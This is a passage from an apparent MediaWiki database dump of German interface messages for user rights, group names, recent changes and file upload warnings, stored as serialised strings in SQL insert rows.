durchgeführt, die noch nicht gespeichert wurden.\nWenn du diese Seite verlässt ohne auf „$1“ zu klicken, werden deine Einstellungen nicht aktualisiert.\";'),('de','messages:prefs-tabs-navigation-hint','s:123:\"Tipp: Du kannst die linke und rechte Pfeiltasten benutzen, um zwischen den Registerkarten in der Reiterliste zu navigieren.\";'),('de','messages:email-address-validity-valid','s:45:\"Diese E-Mail-Adresse scheint gültig zu sein.\";'),('de','messages:email-address-validity-invalid','s:46:\"Eine gültige E-Mail-Adresse ist erforderlich.\";'),('de','messages:userrights','s:24:\"Benutzerrechteverwaltung\";'),('de','messages:userrights-lookup-user','s:31:\"Gruppenzugehörigkeit verwalten\";'),('de','messages:userrights-user-editname','s:13:\"Benutzername:\";'),('de','messages:editusergroup','s:25:\"Benutzerrechte bearbeiten\";'),('de','messages:editinguser','s:50:\"Ändere Benutzerrechte von \'\'\'[[User:$1|$1]]\'\'\' $2\";'),('de','messages:userrights-editusergroup','s:41:\"Benutzer-Gruppenzugehörigkeit bearbeiten\";'),('de','messages:saveusergroups','s:29:\"Gruppenzugehörigkeit ändern\";'),('de','messages:userrights-groupsmember','s:13:\"Mitglied von:\";'),('de','messages:userrights-groupsmember-auto','s:25:\"Automatisch Mitglied von:\";'),('de','messages:userrights-groupsmember-type','s:2:\"$2\";'),('de','messages:userrights-groups-help','s:439:\"Du kannst die Gruppenzugehörigkeit {{GENDER:$1|dieses Benutzers|dieser Benutzerin}} ändern:\n* Ein markiertes Kästchen bedeutet, dass {{GENDER:$1|der Benutzer|die Benutzerin}} Mitglied dieser Gruppe ist.\n* Ein nichtmarkiertes Kästchen bedeutet, dass {{GENDER:$1|der Benutzer|die Benutzerin}} nicht Mitglied dieser Gruppe ist.\n* Ein * bedeutet, dass du das Benutzerrecht nach Erteilung nicht wieder zurücknehmen kannst (oder umgekehrt).\";'),('de','messages:userrights-reason','s:6:\"Grund:\";'),('de','messages:userrights-no-interwiki','s:100:\"Du hast nicht die erforderliche Berechtigung, um Benutzerrechte in anderen Wikis ändern zu können.\";'),('de','messages:userrights-nodatabase','s:54:\"Die Datenbank $1 ist nicht vorhanden oder nicht lokal.\";'),('de','messages:userrights-nologin','s:113:\"Du musst dich mit einem Administrator-Benutzerkonto [[Special:UserLogin|anmelden]], um Benutzerrechte zu ändern.\";'),('de','messages:userrights-notallowed','s:113:\"Du verfügst nicht über die erforderlichen Berechtigungen, um Benutzerrechte vergeben oder entziehen zu können.\";'),('de','messages:userrights-changeable-col','s:44:\"Gruppenzugehörigkeit, die du ändern kannst\";'),('de','messages:userrights-unchangeable-col','s:50:\"Gruppenzugehörigkeit, die du nicht ändern kannst\";'),('de','messages:userrights-conflict','s:85:\"Benutzerrechteänderungskonflikt! Bitte überprüfe und bestätige deine Änderungen.\";'),('de','messages:userrights-removed-self','s:101:\"Du hast deine eigenen Rechte erfolgreich entfernt. Du kannst nicht länger auf diese Seite zugreifen.\";'),('de','messages:group','s:7:\"Gruppe:\";'),('de','messages:group-user','s:8:\"Benutzer\";'),('de','messages:group-autoconfirmed','s:32:\"Automatisch bestätigte Benutzer\";'),('de','messages:group-bot','s:4:\"Bots\";'),('de','messages:group-sysop','s:15:\"Administratoren\";'),('de','messages:group-bureaucrat','s:11:\"Bürokraten\";'),('de','messages:group-suppress','s:11:\"Oversighter\";'),('de','messages:group-all','s:6:\"(alle)\";'),('de','messages:group-user-member','s:33:\"{{GENDER:$1|Benutzer|Benutzerin}}\";'),('de','messages:group-autoconfirmed-member','s:82:\"{{GENDER:$1|Automatisch bestätigter Benutzer|Automatisch bestätigte Benutzerin}}\";'),('de','messages:group-bot-member','s:3:\"Bot\";'),('de','messages:group-sysop-member','s:43:\"{{GENDER:$1|Administrator|Administratorin}}\";'),('de','messages:group-bureaucrat-member','s:35:\"{{GENDER:$1|Bürokrat|Bürokratin}}\";'),('de','messages:group-suppress-member','s:39:\"{{GENDER:$1|Oversighter|Oversighterin}}\";'),('de','messages:grouppage-user','s:23:\"{{ns:project}}:Benutzer\";'),('de','messages:grouppage-autoconfirmed','s:47:\"{{ns:project}}:Automatisch bestätigte Benutzer\";'),('de','messages:grouppage-bot','s:19:\"{{ns:project}}:Bots\";'),('de','messages:grouppage-sysop','s:30:\"{{ns:project}}:Administratoren\";'),('de','messages:grouppage-bureaucrat','s:26:\"{{ns:project}}:Bürokraten\";'),('de','messages:grouppage-suppress','s:26:\"{{ns:project}}:Oversighter\";'),('de','messages:right-read','s:12:\"Seiten lesen\";'),('de','messages:right-edit','s:17:\"Seiten bearbeiten\";'),('de','messages:right-createpage','s:51:\"Seiten erstellen (die keine Diskussionsseiten sind)\";'),('de','messages:right-createtalk','s:27:\"Diskussionsseiten erstellen\";'),('de','messages:right-createaccount','s:23:\"Benutzerkonto erstellen\";'),('de','messages:right-minoredit','s:33:\"Bearbeitungen als klein markieren\";'),('de','messages:right-move','s:18:\"Seiten verschieben\";'),('de','messages:right-move-subpages','s:40:\"Seiten inklusive Unterseiten verschieben\";'),('de','messages:right-move-rootuserpages','s:32:\"Haupt-Benutzerseiten verschieben\";'),('de','messages:right-move-categorypages','s:27:\"Kategorieseiten verschieben\";'),('de','messages:right-movefile','s:19:\"Dateien verschieben\";'),('de','messages:right-suppressredirect','s:65:\"Beim Verschieben die Erstellung einer Weiterleitung unterdrücken\";'),('de','messages:right-upload','s:17:\"Dateien hochladen\";'),('de','messages:right-reupload','s:38:\"Überschreiben einer vorhandenen Datei\";'),('de','messages:right-reupload-own','s:53:\"Überschreiben einer zuvor selbst hochgeladenen Datei\";'),('de','messages:right-reupload-shared','s:88:\"Lokales Überschreiben einer in einem gemeinsam genutzten Repositorium vorhandenen Datei\";'),('de','messages:right-upload_by_url','s:39:\"Dateien von einer URL-Adresse hochladen\";'),('de','messages:right-purge','s:34:\"Seitencache leeren ohne Rückfrage\";'),('de','messages:right-autoconfirmed','s:44:\"Keine Beschränkung durch IP-basierte Limits\";'),('de','messages:right-bot','s:36:\"Behandlung als automatischer Prozess\";'),('de','messages:right-nominornewtalk','s:90:\"Kleine Bearbeitungen an Diskussionsseiten führen zu keiner „Neue Nachrichten“-Anzeige\";'),('de','messages:right-apihighlimits','s:30:\"Höhere Limits in API-Abfragen\";'),('de','messages:right-writeapi','s:22:\"Benutzung der writeAPI\";'),('de','messages:right-delete','s:15:\"Seiten löschen\";'),('de','messages:right-bigdelete','s:46:\"Seiten mit großer Versionsgeschichte löschen\";'),('de','messages:right-deletelogentry','s:56:\"Einzelne Logbuch-Einträge löschen und wiederherstellen\";'),('de','messages:right-deleterevision','s:60:\"Einzelne Versionen einer Seite löschen und wiederherstellen\";'),('de','messages:right-deletedhistory','s:78:\"Gelöschte Versionen in der Versionsgeschichte ansehen, ohne zugehörigen Text\";'),('de','messages:right-deletedtext','s:80:\"Gelöschte Texte und Versionsunterschiede zwischen gelöschten Versionen ansehen\";'),('de','messages:right-browsearchive','s:30:\"Nach gelöschten Seiten suchen\";'),('de','messages:right-undelete','s:23:\"Seiten wiederherstellen\";'),('de','messages:right-suppressrevision','s:81:\"Bestimmte Versionen vor jedem Benutzer verstecken, wiederherstellen und anschauen\";'),('de','messages:right-viewsuppressed','s:47:\"Vor jedem Benutzer versteckte Versionen ansehen\";'),('de','messages:right-suppressionlog','s:26:\"Private Logbücher ansehen\";'),('de','messages:right-block','s:31:\"Benutzer sperren (Schreibrecht)\";'),('de','messages:right-blockemail','s:41:\"Benutzer am Versenden von E-Mails hindern\";'),('de','messages:right-hideuser','s:35:\"Benutzernamen sperren und verbergen\";'),('de','messages:right-ipblock-exempt','s:63:\"Ausnahme von IP-Sperren, automatischen Sperren und Rangesperren\";'),('de','messages:right-proxyunbannable','s:39:\"Ausnahme von automatischen Proxysperren\";'),('de','messages:right-unblockself','s:15:\"Sich entsperren\";'),('de','messages:right-protect','s:68:\"Seitenschutzstatus ändern und kaskadengeschützte Seiten bearbeiten\";'),('de','messages:right-editprotected','s:76:\"Seiten bearbeiten, die als „{{int:protect-level-sysop}}“ geschützt sind\";'),('de','messages:right-editsemiprotected','s:84:\"Seiten bearbeiten, die als „{{int:protect-level-autoconfirmed}}“ geschützt sind\";'),('de','messages:right-editinterface','s:30:\"Benutzeroberfläche bearbeiten\";'),('de','messages:right-editusercssjs','s:45:\"Fremde CSS- und JavaScript-Dateien bearbeiten\";'),('de','messages:right-editusercss','s:29:\"Fremde CSS-Dateien bearbeiten\";'),('de','messages:right-edituserjs','s:36:\"Fremde JavaScript-Dateien bearbeiten\";'),('de','messages:right-editmyusercss','s:38:\"Eigene Benutzer-CSS-Dateien bearbeiten\";'),('de','messages:right-editmyuserjs','s:45:\"Eigene Benutzer-JavaScript-Dateien bearbeiten\";'),('de','messages:right-viewmywatchlist','s:32:\"Eigene Beobachtungsliste ansehen\";'),('de','messages:right-editmywatchlist','s:111:\"Eigene Beobachtungsliste bearbeiten. Einige Aktionen ermöglichen das Hinzufügen von Seiten ohne dieses Recht.\";'),('de','messages:right-viewmyprivateinfo','s:80:\"Eigene private Daten ansehen (beispielsweise E-Mail-Adresse, bürgerlicher Name)\";'),('de','messages:right-editmyprivateinfo','s:83:\"Eigene private Daten bearbeiten (beispielsweise E-Mail-Adresse, bürgerlicher Name)\";'),('de','messages:right-editmyoptions','s:31:\"Eigene Einstellungen bearbeiten\";'),('de','messages:right-rollback','s:23:\"Schnelles Zurücksetzen\";'),('de','messages:right-markbotedits','s:67:\"Schnell zurückgesetzte Bearbeitungen als Bot-Bearbeitung markieren\";'),('de','messages:right-noratelimit','s:32:\"Keine Beschränkung durch Limits\";'),('de','messages:right-import','s:36:\"Seiten aus anderen Wikis importieren\";'),('de','messages:right-importupload','s:46:\"Seiten über Hochladen von Dateien importieren\";'),('de','messages:right-patrol','s:47:\"Fremde Bearbeitungen als kontrolliert markieren\";'),('de','messages:right-autopatrol','s:59:\"Eigene Bearbeitungen automatisch als kontrolliert markieren\";'),('de','messages:right-patrolmarks','s:53:\"Kontrollmarkierungen in den letzten Änderungen sehen\";'),('de','messages:right-unwatchedpages','s:39:\"Liste der unbeobachteten Seiten ansehen\";'),('de','messages:right-mergehistory','s:39:\"Versionsgeschichten von Seiten vereinen\";'),('de','messages:right-userrights','s:25:\"Benutzerrechte bearbeiten\";'),('de','messages:right-userrights-interwiki','s:42:\"Benutzerrechte in anderen Wikis bearbeiten\";'),('de','messages:right-siteadmin','s:32:\"Datenbank sperren und entsperren\";'),('de','messages:right-override-export-depth','s:76:\"Exportiere Seiten einschließlich verlinkter Seiten bis zu einer Tiefe von 5\";'),('de','messages:right-sendemail','s:33:\"E-Mails an andere Benutzer senden\";'),('de','messages:right-passwordreset','s:79:\"Passwort eines Benutzers zurücksetzen und die dazu verschickte E-Mail einsehen\";'),('de','messages:newuserlogpage','s:21:\"Neuanmeldungs-Logbuch\";'),('de','messages:newuserlogpagetext','s:55:\"Dies ist ein Logbuch der neu erstellten Benutzerkonten.\";'),('de','messages:rightslog','s:14:\"Rechte-Logbuch\";'),('de','messages:rightslogtext','s:56:\"Dies ist das Logbuch der Änderungen der Benutzerrechte.\";'),('de','messages:action-read','s:18:\"die Seite zu lesen\";'),('de','messages:action-edit','s:23:\"die Seite zu bearbeiten\";'),('de','messages:action-createpage','s:19:\"Seiten zu erstellen\";'),('de','messages:action-createtalk','s:30:\"Diskussionsseiten zu erstellen\";'),('de','messages:action-createaccount','s:30:\"ein Benutzerkonto zu erstellen\";'),('de','messages:action-history','s:45:\"die Versionsgeschichte dieser Seite anzusehen\";'),('de','messages:action-minoredit','s:40:\"diese Bearbeitung als klein zu markieren\";'),('de','messages:action-move','s:24:\"die Seite zu verschieben\";'),('de','messages:action-move-subpages','s:54:\"diese Seite und zugehörige Unterseiten zu verschieben\";'),('de','messages:action-move-rootuserpages','s:35:\"Haupt-Benutzerseiten zu verschieben\";'),('de','messages:action-move-categorypages','s:30:\"Kategorieseiten zu verschieben\";'),('de','messages:action-movefile','s:23:\"Diese Datei verschieben\";'),('de','messages:action-upload','s:19:\"Dateien hochzuladen\";'),('de','messages:action-reupload','s:38:\"die vorhandene Datei zu überschreiben\";'),('de','messages:action-reupload-shared','s:70:\"diese Datei aus dem gemeinsam genutzten Repositorium zu überschreiben\";'),('de','messages:action-upload_by_url','s:46:\"Dateien von einer Webadresse (URL) hochzuladen\";'),('de','messages:action-writeapi','s:41:\"die API mit Schreibzugriffen zu verwenden\";'),('de','messages:action-delete','s:18:\"Seiten zu löschen\";'),('de','messages:action-deleterevision','s:21:\"Versionen zu löschen\";'),('de','messages:action-deletedhistory','s:44:\"die Liste der gelöschten Versionen zu sehen\";'),('de','messages:action-browsearchive','s:33:\"nach gelöschten Seiten zu suchen\";'),('de','messages:action-undelete','s:28:\"die Seite wiederherzustellen\";'),('de','messages:action-suppressrevision','s:56:\"die versteckte Version einzusehen und wiederherzustellen\";'),('de','messages:action-suppressionlog','s:30:\"das private Logbuch einzusehen\";'),('de','messages:action-block','s:23:\"den Benutzer zu sperren\";'),('de','messages:action-protect','s:38:\"den Schutzstatus von Seiten zu ändern\";'),('de','messages:action-rollback','s:86:\"die Änderungen des letzten Bearbeiters einer bestimmten Seite schnell zurückzusetzen\";'),('de','messages:action-import','s:44:\"Seiten aus einem anderen Wiki zu importieren\";'),('de','messages:action-importupload','s:53:\"Seiten über das Hochladen einer Datei zu importieren\";'),('de','messages:action-patrol','s:60:\"Bearbeitungen anderer Benutzer als kontrolliert zu markieren\";'),('de','messages:action-autopatrol','s:50:\"eigene Bearbeitungen als kontrolliert zu markieren\";'),('de','messages:action-unwatchedpages','s:46:\"die Liste der unbeobachteten Seiten einzusehen\";'),('de','messages:action-mergehistory','s:46:\"die Versionsgeschichten von Seiten zu vereinen\";'),('de','messages:action-userrights','s:25:\"Benutzerrechte zu ändern\";'),('de','messages:action-userrights-interwiki','s:52:\"die Rechte von Benutzern in anderen Wikis zu ändern\";'),('de','messages:action-siteadmin','s:41:\"die Datenbank zu sperren oder freizugeben\";'),('de','messages:action-sendemail','s:17:\"E-Mails zu senden\";'),('de','messages:action-editmywatchlist','s:37:\"deine Beobachtungsliste zu bearbeiten\";'),('de','messages:action-viewmywatchlist','s:33:\"deine Beobachtungsliste anzusehen\";'),('de','messages:action-viewmyprivateinfo','s:39:\"deine privaten Informationen einzusehen\";'),('de','messages:action-editmyprivateinfo','s:42:\"deine privaten Informationen zu bearbeiten\";'),('de','messages:nchanges','s:38:\"$1 {{PLURAL:$1|Änderung|Änderungen}}\";'),('de','messages:enhancedrc-since-last-visit','s:40:\"$1 {{PLURAL:$1|seit dem letzten Besuch}}\";'),('de','messages:enhancedrc-history','s:18:\"Versionsgeschichte\";'),('de','messages:recentchanges','s:18:\"Letzte Änderungen\";'),('de','messages:recentchanges-legend','s:15:\"Anzeigeoptionen\";'),('de','messages:recentchanges-summary','s:80:\"Auf dieser Seite kannst du die letzten Änderungen in diesem Wiki nachverfolgen.\";'),('de','messages:recentchanges-noresult','s:82:\"Keine Änderungen während des angegebenen Zeitraums entsprechen diesen Kriterien.\";'),('de','messages:recentchanges-feed-description','s:65:\"Verfolge mit diesem Feed die letzten Änderungen in {{SITENAME}}.\";'),('de','messages:recentchanges-label-newpage','s:10:\"Neue Seite\";'),('de','messages:recentchanges-label-minor','s:16:\"Kleine Änderung\";'),('de','messages:recentchanges-label-bot','s:25:\"Änderung durch einen Bot\";'),('de','messages:recentchanges-label-unpatrolled','s:29:\"Nicht-kontrollierte Änderung\";'),('de','messages:recentchanges-label-plusminus','s:40:\"Die Änderung der Seitengröße in Bytes\";'),('de','messages:recentchanges-legend-heading','s:14:\"\'\'\'Legende:\'\'\'\";'),('de','messages:recentchanges-legend-newpage','s:92:\"{{int:recentchanges-label-newpage}} (siehe auch die [[Special:NewPages|Liste neuer Seiten]])\";'),('de','messages:recentchanges-legend-plusminus','s:11:\"\'\'(±123)\'\'\";'),('de','messages:rcnotefrom','s:132:\"Angezeigt {{PLURAL:$5|wird die Änderung|werden die Änderungen}} seit $3, $4 (max. $1 Einträge).\";'),('de','messages:rclistfrom','s:39:\"Nur Änderungen seit $3, $2 Uhr zeigen.\";'),('de','messages:rcshowhideminor','s:21:\"Kleine Änderungen $1\";'),('de','messages:rcshowhideminor-show','s:8:\"anzeigen\";'),('de','messages:rcshowhideminor-hide','s:10:\"ausblenden\";'),('de','messages:rcshowhidebots','s:7:\"Bots $1\";'),('de','messages:rcshowhidebots-show','s:8:\"anzeigen\";'),('de','messages:rcshowhidebots-hide','s:10:\"ausblenden\";'),('de','messages:rcshowhideliu','s:24:\"Registrierte Benutzer $1\";'),('de','messages:rcshowhideliu-show','s:8:\"anzeigen\";'),('de','messages:rcshowhideliu-hide','s:10:\"ausblenden\";'),('de','messages:rcshowhideanons','s:25:\"Unangemeldete Benutzer $1\";'),('de','messages:rcshowhideanons-show','s:8:\"anzeigen\";'),('de','messages:rcshowhideanons-hide','s:10:\"ausblenden\";'),('de','messages:rcshowhidepatr','s:28:\"Kontrollierte Änderungen $1\";'),('de','messages:rcshowhidepatr-show','s:8:\"anzeigen\";'),('de','messages:rcshowhidepatr-hide','s:10:\"ausblenden\";'),('de','messages:rcshowhidemine','s:19:\"Eigene Beiträge $1\";'),('de','messages:rcshowhidemine-show','s:8:\"anzeigen\";'),('de','messages:rcshowhidemine-hide','s:10:\"ausblenden\";'),('de','messages:rclinks','s:61:\"Zeige die letzten $1 Änderungen der letzten $2 Tage.
                                                                $3\";'),('de','messages:diff','s:11:\"Unterschied\";'),('de','messages:hist','s:9:\"Versionen\";'),('de','messages:hide','s:10:\"ausblenden\";'),('de','messages:show','s:10:\"einblenden\";'),('de','messages:minoreditletter','s:1:\"K\";'),('de','messages:newpageletter','s:1:\"N\";'),('de','messages:boteditletter','s:1:\"B\";'),('de','messages:number_of_watching_users_pageview','s:54:\"[$1 {{PLURAL:$1|beobachtender|beobachtende}} Benutzer]\";'),('de','messages:rc_categories','s:53:\"Nur Seiten aus den Kategorien (getrennt mit „|“):\";'),('de','messages:rc_categories_any','s:4:\"Alle\";'),('de','messages:rc-change-size','s:27:\"$1 {{PLURAL:$1|Byte|Bytes}}\";'),('de','messages:rc-change-size-new','s:46:\"$1 {{PLURAL:$1|Byte|Bytes}} nach der Änderung\";'),('de','messages:newsectionsummary','s:24:\"Neuer Abschnitt /* $1 */\";'),('de','messages:rc-enhanced-expand','s:21:\"Einzelheiten anzeigen\";'),('de','messages:rc-enhanced-hide','s:23:\"Einzelheiten verstecken\";'),('de','messages:rc-old-title','s:35:\"ursprünglich erstellt als „$1“\";'),('de','messages:recentchangeslinked','s:32:\"Änderungen an verlinkten Seiten\";'),('de','messages:recentchangeslinked-feed','s:32:\"Änderungen an verlinkten Seiten\";'),('de','messages:recentchangeslinked-toolbox','s:32:\"Änderungen an verlinkten Seiten\";'),('de','messages:recentchangeslinked-title','s:53:\"Änderungen an Seiten, die von „$1“ verlinkt sind\";'),('de','messages:recentchangeslinked-summary','s:224:\"Diese Spezialseite listet die letzten Änderungen an den verlinkten Seiten auf (bzw. bei Kategorien an den Mitgliedern dieser Kategorie). Seiten auf deiner [[Special:Watchlist|Beobachtungsliste]] sind \'\'\'fett\'\'\' dargestellt.\";'),('de','messages:recentchangeslinked-page','s:6:\"Seite:\";'),('de','messages:recentchangeslinked-to','s:63:\"Zeige nur Änderungen auf Seiten, die auf diese Seite verlinken\";'),('de','messages:upload','s:15:\"Datei hochladen\";'),('de','messages:uploadbtn','s:15:\"Datei hochladen\";'),('de','messages:reuploaddesc','s:41:\"Abbrechen und zurück zur Hochladen-Seite\";'),('de','messages:upload-tryagain','s:39:\"Geänderte Dateibeschreibung abschicken\";'),('de','messages:uploadnologin','s:16:\"Nicht angemeldet\";'),('de','messages:uploadnologintext','s:50:\"Du musst dich $1, um Dateien hochladen zu können.\";'),('de','messages:upload_directory_missing','s:92:\"Das Upload-Verzeichnis ($1) fehlt und konnte durch den Webserver auch nicht erstellt werden.\";'),('de','messages:upload_directory_read_only','s:71:\"Der Webserver hat keine Schreibrechte für das Upload-Verzeichnis ($1).\";'),('de','messages:uploaderror','s:21:\"Fehler beim Hochladen\";'),('de','messages:upload-recreate-warning','s:157:\"\'\'\'Achtung: Eine Datei dieses Namens wurde bereits gelöscht oder verschoben.\'\'\'\n\nEs folgt ein Auszug aus dem Lösch- und Verschiebungs-Logbuch dieser Datei.\";'),('de','messages:uploadtext','s:814:\"Benutze dieses Formular, um neue Dateien hochzuladen.\n\nGehe zu der [[Special:FileList|Liste hochgeladener Dateien]], um vorhandene Dateien zu suchen und anzuzeigen. Siehe auch das [[Special:Log/upload|Datei-]] und [[Special:Log/delete|Lösch-Logbuch]].\n\nUm ein \'\'\'Bild\'\'\' in einer Seite zu verwenden, nutze einen Link in der folgenden Form:\n* \'\'\'[[{{ns:file}}:Datei.jpg]]\'\'\' – für ein Vollbild\n* \'\'\'[[{{ns:file}}:Datei.png|200px|thumb|left|Alternativer Text]]\'\'\' – für ein 200px breites Bild innerhalb einer Box, mit „Alternativer Text“ als Bildbeschreibung\n* \'\'\'[[{{ns:media}}:Datei.ogg]]\'\'\' – für einen direkten Link auf die Datei, ohne Darstellung der Datei\";'),('de','messages:upload-permitted','s:24:\"Erlaubte Dateitypen: $1.\";'),('de','messages:upload-preferred','s:26:\"Bevorzugte Dateitypen: $1.\";'),('de','messages:upload-prohibited','s:30:\"Nicht erlaubte Dateitypen: $1.\";'),('de','messages:uploadlogpage','s:13:\"Datei-Logbuch\";'),('de','messages:uploadlogpagetext','s:138:\"Dies ist das Logbuch der hochgeladenen Dateien, siehe auch die [[Special:NewFiles|Galerie neuer Dateien]] für einen visuellen Überblick.\";'),('de','messages:filename','s:9:\"Dateiname\";'),('de','messages:filedesc','s:12:\"Beschreibung\";'),('de','messages:fileuploadsummary','s:20:\"Beschreibung/Quelle:\";'),('de','messages:filereuploadsummary','s:17:\"Dateiänderungen:\";'),('de','messages:filestatus','s:17:\"Copyright-Status:\";'),('de','messages:filesource','s:7:\"Quelle:\";'),('de','messages:ignorewarning','s:38:\"Warnung ignorieren und Datei speichern\";'),('de','messages:ignorewarnings','s:20:\"Warnungen ignorieren\";'),('de','messages:minlength1','s:57:\"Dateinamen müssen mindestens einen Buchstaben lang sein.\";'),('de','messages:illegalfilename','s:136:\"Der Dateiname „$1“ enthält mindestens ein nicht erlaubtes Zeichen. Bitte benenne die Datei um und versuche, sie erneut hochzuladen.\";'),('de','messages:filename-toolong','s:53:\"Dateinamen dürfen nicht größer als 240 Bytes sein.\";'),('de','messages:badfilename','s:42:\"Der Dateiname wurde in „$1“ geändert.\";'),('de','messages:filetype-mime-mismatch','s:71:\"Dateierweiterung „.$1“ stimmt nicht mit dem MIME-Typ ($2) überein.\";'),('de','messages:filetype-badmime','s:67:\"Dateien mit dem MIME-Typ „$1“ dürfen nicht hochgeladen werden.\";'),('de','messages:filetype-bad-ie-mime','s:160:\"Diese Datei kann nicht hochgeladen werden, da der Internet Explorer sie als „$1“ erkennt, welcher ein nicht erlaubter potentiell gefährlicher Dateityp ist.\";'),('de','messages:filetype-unwanted-type','s:120:\"\'\'\'„.$1“\'\'\' ist ein unerwünschtes Dateiformat. Erlaubt {{PLURAL:$3|ist das Dateiformat|sind die Dateiformate}}: $2.\";'),('de','messages:filetype-banned-type','s:160:\"\'\'\'„.$1“\'\'\' {{PLURAL:$4|ist ein nicht erlaubter Dateityp|sind nicht erlaubte Dateitypen}}.\n{{PLURAL:$3|Erlaubter Dateityp ist|Erlaubte Dateitypen sind}} $2.\";'),('de','messages:filetype-missing','s:65:\"Die hochzuladende Datei hat keine Erweiterung (z. B. „.jpg“).\";'),('de','messages:empty-file','s:49:\"Die von dir übertragene Datei hat keinen Inhalt.\";'),('de','messages:file-too-large','s:36:\"Die hochgeladene Datei war zu groß.\";'),('de','messages:filename-tooshort','s:26:\"Der Dateiname ist zu kurz.\";'),('de','messages:filetype-banned','s:31:\"Diese Dateiendung ist gesperrt.\";'),('de','messages:verification-error','s:50:\"Diese Datei hat die Dateiprüfung nicht bestanden.\";'),('de','messages:hookaborted','s:89:\"Der Versuch, die Änderung durchzuführen, wurde von einer Parsererweiterung abgebrochen.\";'),('de','messages:illegal-filename','s:34:\"Der Dateiname ist nicht zulässig.\";'),('de','messages:overwrite','s:69:\"Das Überschreiben einer bereits vorhandenen Datei ist nicht erlaubt.\";'),('de','messages:unknown-error','s:39:\"Ein unbekannter Fehler ist aufgetreten.\";'),('de','messages:tmp-create-error','s:45:\"Temporäre Datei konnte nicht erstellt werden\";'),('de','messages:tmp-write-error','s:43:\"Fehler beim Schreiben der temporären Datei\";'),('de','messages:large-file','s:92:\"Die Dateigröße sollte nach Möglichkeit $1 nicht überschreiten. Diese Datei ist $2 groß.\";'),('de','messages:largefileserver','s:70:\"Die Datei ist größer als die vom Server eingestellte Maximalgröße.\";'),('de','messages:emptyfile','s:145:\"Die hochgeladene Datei ist leer. Der Grund kann ein Tippfehler im Dateinamen sein. Bitte kontrolliere, ob du die Datei wirklich hochladen willst.\";'),('de','messages:windows-nonascii-filename','s:71:\"Dieses Wiki unterstützt keine Dateinamen, die Sonderzeichen enthalten.\";'),('de','messages:fileexists','s:173:\"Eine Datei dieses Namens ist bereits vorhanden. Bitte prüfe [[:$1]], sofern {{GENDER:|du}} dir nicht sicher bist, ob du sie ändern möchtest.\n[[$1|thumb]]\";'),('de','messages:filepageexists','s:307:\"Eine Beschreibungsseite wurde bereits als [[:$1]] erstellt, es ist aber keine Datei mit diesem Namen vorhanden.\nDie eingegebene Beschreibung wird nicht auf die Beschreibungsseite übernommen.\nDie Beschreibungsseite musst du nach dem Hochladen der Datei noch manuell bearbeiten.\n[[$1|thumb]]\";'),('de','messages:fileexists-extension','s:246:\"Eine Datei ähnlichen Namens ist bereits vorhanden: [[$2|thumb]]\n* Name der hochzuladenden Datei: [[:$1]]\n* Name der bereits vorhandenen Datei: [[:$2]]\nMöchtest du vielleicht einen eindeutigeren Namen verwenden?\";'),('de','messages:fileexists-thumbnail-yes','s:266:\"Bei der Datei scheint es sich um ein Bild verringerter Größe \'\'(Miniatur)\'\' zu handeln. [[$1|thumb]]\nBitte prüfe die Datei [[:$1]].\nWenn es sich um das Bild in Originalgröße handelt, so braucht kein separates Vorschaubild hochgeladen zu werden.\";'),('de','messages:file-thumbnail-no','s:224:\"Der Dateiname beginnt mit $1. Dies deutet auf ein Bild verringerter Größe \'\'(Minitatur)\'\' hin.\nBitte prüfe, ob du das Bild in voller Auflösung vorliegen hast und lade dieses unter dem Originalnamen hoch.\";'),('de','messages:fileexists-forbidden','s:187:\"Unter diesem Namen existiert bereits eine Datei und sie kann nicht überschrieben werden. Bitte gehe zurück und lade die Datei unter einem anderen Namen hoch. [[File:$1|thumb|center|$1]]\";'),('de','messages:fileexists-shared-forbidden','s:194:\"Unter diesem Namen existiert bereits eine Datei im zentralen Medienarchiv.\nWenn du diese Datei trotzdem hochladen möchtest, gehe bitte zurück und ändere den Namen.\n[[File:$1|thumb|center|$1]]\";'),('de','messages:file-exists-duplicate','s:74:\"Diese Datei ist ein Duplikat der folgenden {{PLURAL:$1|Datei|$1 Dateien}}:\";'),('de','messages:file-deleted-duplicate','s:121:\"Eine mit dieser identische Datei ([[:$1]]) wurde früher gelöscht. Sieh das Lösch-Logbuch ein, bevor du sie hochlädst.\";'),('de','messages:file-deleted-duplicate-notitle','s:238:\"Eine identische Datei wurde kürzlich gelöscht und der Titel wurde unterdrückt.\nDu solltest jemanden fragen, der die Möglichkeit hat, die unterdrückten Dateidaten anzusehen, um die Situation vor dem erneuten Hochladen zu überprüfen.\";'),('de','messages:uploadwarning','s:7:\"Warnung\";'),('de','messages:uploadwarning-text','s:65:\"Bitte ändere unten die Dateibeschreibung und versuche es erneut.\";'),('de','messages:savefile','s:15:\"Datei speichern\";'),('de','messages:uploaddisabled','s:21:\"Hochladen deaktiviert\";'),('de','messages:copyuploaddisabled','s:38:\"Das Hochladen von URLs ist deaktiviert\";'),('de','messages:uploaddisabledtext','s:42:\"Das Hochladen von Dateien ist deaktiviert.\";'),('de','messages:php-uploaddisabledtext','s:112:\"Das Hochladen von Dateien wurde in PHP deaktiviert.\nBitte überprüfe die file_uploads-Einstellung.\";'),('de','messages:uploadscripted','s:108:\"Diese Datei enthält HTML- oder Scriptcode, der irrtümlich von einem Webbrowser ausgeführt werden könnte.\";'),('de','messages:uploadscriptednamespace','s:61:\"Diese SVG-Datei enthält den ungültigen Namensraum „$1“.\";'),('de','messages:uploadinvalidxml','s:63:\"Das XML in der hochgeladenen Datei konnte nicht geparst werden.\";'),('de','messages:uploadvirus','s:45:\"Diese Datei enthält einen Virus! Details: $1\";'),('de','messages:uploadjava','s:190:\"Dies ist eine ZIP-Datei, die ein CLASS-Datei von Java enthält.\nDas Hochladen von Java-Dateien ist nicht gestattet, da sie die Umgehung von Sicherheitseinschränkungen ermöglichen könnten.\";'),('de','messages:upload-source','s:10:\"Quelldatei\";'),('de','messages:sourcefilename','s:11:\"Quelldatei:\";'),('de','messages:sourceurl','s:10:\"Quell-URL:\";'),('de','messages:destfilename','s:9:\"Zielname:\";'),('de','messages:upload-maxfilesize','s:25:\"Maximale Dateigröße: $1\";'),('de','messages:upload-description','s:17:\"Dateibeschreibung\";'),('de','messages:upload-options','s:16:\"Hochladeoptionen\";'),('de','messages:watchthisupload','s:22:\"Diese Datei beobachten\";'),('de','messages:filewasdeleted','s:176:\"Eine Datei mit diesem Namen wurde schon einmal hochgeladen und zwischenzeitlich wieder gelöscht. Bitte prüfe zuerst den Eintrag im $1, bevor du die Datei wirklich speicherst.\";'),('de','messages:filename-bad-prefix','s:220:\"Der Dateiname beginnt mit \'\'\'„$1“\'\'\'. Dies ist im allgemeinen der von einer Digitalkamera 